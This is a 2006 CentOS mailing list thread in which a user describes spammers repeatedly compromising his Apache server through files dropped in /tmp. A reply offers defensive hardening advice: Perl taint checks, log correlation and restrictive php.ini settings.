Just as an fyi on a good checklist for linux (not comprehensive but a good start) http://www.cisecurity.org/bench_linux.html
And some good areas via google on secure centos installations.
If they do it again then it wont be your perl script obviously as you mentioned disabling the script, but if not, is your script configured with use strict and taint? Is every var in the script checked to ensure the data is within an allowed range? Does the perl script rely on third-party modules? If so you might check there as well.
The rest is an assumption that you may have php installed on the system and someone may have used a php script as a gateway into your system.
Even though the box has been compromised you may get lucky if this is related to apache by looking at the timestamp on the files in /tmp and correlate those with your apache logs.
If so check your php logs as well(if you enabled it in /etc/php.ini). Are you running in safe mode? There are some things you can do to help reduce the amount of damage a vulnerable php script can do:
safe_mode = On safe_mode_gid = On safe_mode_include_dir = /path where any include files you trust reside. Read only by apache process safe_mode_exec_dir = /path to area where you allow any executables to be called from php scripts
Also (not restricted to safe mode) is if this is a home server you can also restrict where php scripts can 'roam': open_basedir = /var/www/html (for example) will prevent php scripts from going outside the /var/www/html area.
If your done debugging any web code set this display_errors = off
And turn on php file logging log_errors = On error_log = /var/log/phplogfilename.log
Unless you need to allow file uploads turn that off too file_uploads = Off
The same goes for treating URLs as files allow_url_fopen = Off
Also make sure all the files in /var/www/html or whatever are not owned by the apache process so they cannot be over-written if at all possible.
-Greg
-----Original Message----- From: centos-bounces@centos.org [mailto:centos-bounces@centos.org] On Behalf Of Matthew T. O'Connor Sent: Thursday, June 22, 2006 11:53 AM To: CentOS mailing list Subject: [CentOS] Apache Security
Hello, I have a server running CentOS 4.3 with all the latest updates. The server in question has been hacked by spammers a few times. The details of the hack have been basically the same every time. I find some directory created by the apache user account in /tmp. The new directory contains an html file, and a list of email addresses to spam and a perl script that spams all those email addresses with the html file.
My question is why is this happening? Obviously it's some apache exploit. I have removed mod_perl, that didn't help. I have now changed the permissions on the perl executable, that might help we will see, but that doesn't address the core problem. How is it that someone can upload arbitrary files to my server and then execute an arbitrary command via apache.
Is this a know problem? Have others seen it? What can I do to help prevent this?
Thanks,
Matt _______________________________________________ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos